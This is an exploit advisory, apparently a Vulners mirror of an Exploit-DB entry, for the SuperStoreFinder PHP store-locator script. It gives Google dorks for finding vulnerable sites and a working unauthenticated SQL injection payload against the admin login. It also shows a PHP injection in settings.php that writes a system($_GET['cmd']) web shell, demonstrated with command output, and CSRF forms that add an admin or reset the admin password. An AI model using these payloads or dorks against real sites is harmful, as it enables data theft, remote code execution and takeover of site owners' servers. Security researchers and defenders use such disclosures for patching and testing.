Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SuperStoreFinder - Multiple Vulnerabilities

🗓️ 27 Feb 2024 00:00:00Reported by bRpsdType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 437 Views

Super Store Finder PHP/Javascript/MySQL store locator script with Google Maps API for easy store location. Features Geo Location, Drag and Drop Marker, Bulk Import, Google Street View, Maps Direction.

Code
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 .:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities

.:. Google Dorks .:.
"designed and built by Joe Iz."
"Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."
inurl:/superstorefinder/index.php

.:. Date: 0ctober 13, 2023
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.superstorefinder.net/
.:. Product -> https://codecanyon.net/item/super-store-finder/3630922
.:. Product Version -> [3.7 and below]
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


 #############
 |DESCRIPTION|
 #############
"Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations"






Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind,error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]

===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind,error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]



Test #1

http://localhost:9000/adminstorefinder/admin/index.php

username=a'&password=1&btn_login=Login

Response Error:
Array
(
    [0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1
)
SELECT users.* FROM users WHERE users.username='admin''
===========================================================================================

Test #2 => Payload (Proof Of Concept)

http://localhost:9000/adminstorefinder/admin/index.php

username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj
&password=1&btn_login=Login


Response Error:
Array
(
    [0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist
)
===========================================================================================



======================================================================================================================================================================================
Vulnerability 2: Authenticated PHP Injection - Remote Code Exectuion
File: localhost/admin/settings.php
Vul Parameter: language_set [POST]


Proof of concept:
http://localhost:9000/superstorefinder/admin/settings.php
langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1


Index.php included in the config.inc.php , we just can go for rce
with GET parameter ?cmd=


http://localhost:9000/?cmd=uname -a

Reponse:
22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64
===========================================================================================




===========================================================================================
Vulnerability 3: Cross Site Request Forgery
Risk: It can lead to Privilege Escalation through adding admins or changing admin password.
Affected Files (1): localhost/superstorefinder/admin/users_add.php
Parameters: username,password,cpassword

Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
    <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
      <input name="submit_hidden" value="submit_hidden" type="hidden" />
      <input type='hidden' name='username' value='X'>
        <input type='hidden' name='password' value='123'>
      <input type='hidden' name='cpassword' value='123'>
      <input type='hidden' value='submit'>
    </form>
    <script>document.getElementById("CSRF").submit()</script>
      <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>




Affected Files (2:):localhost/superstorefinder/admin/change_password.php
Parameters: password,cpassword,save

Proof of concept:
<iframe style="display:none" name="CSRF"></iframe>
    <form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
      <input type='hidden' name='password' value='123'>
        <input type='hidden' name='cpassword' value='123'>
      <input type='hidden' name="save=" value='save'>
    </form>
    <script>document.getElementById("CSRF").submit()</script>
      <iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
    ======================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Feb 2024 00:00Current
7.4High risk
Vulners AI Score7.4
super store finderjoe izhighwarden huntsmanphpjavascriptmysqlgoogle maps apigeo locationdrag and drop markerbulk importgoogle street viewmaps directionremote code executionauthenticated php injectionunauthenticated sql injectionmulti-languagecustomizable
437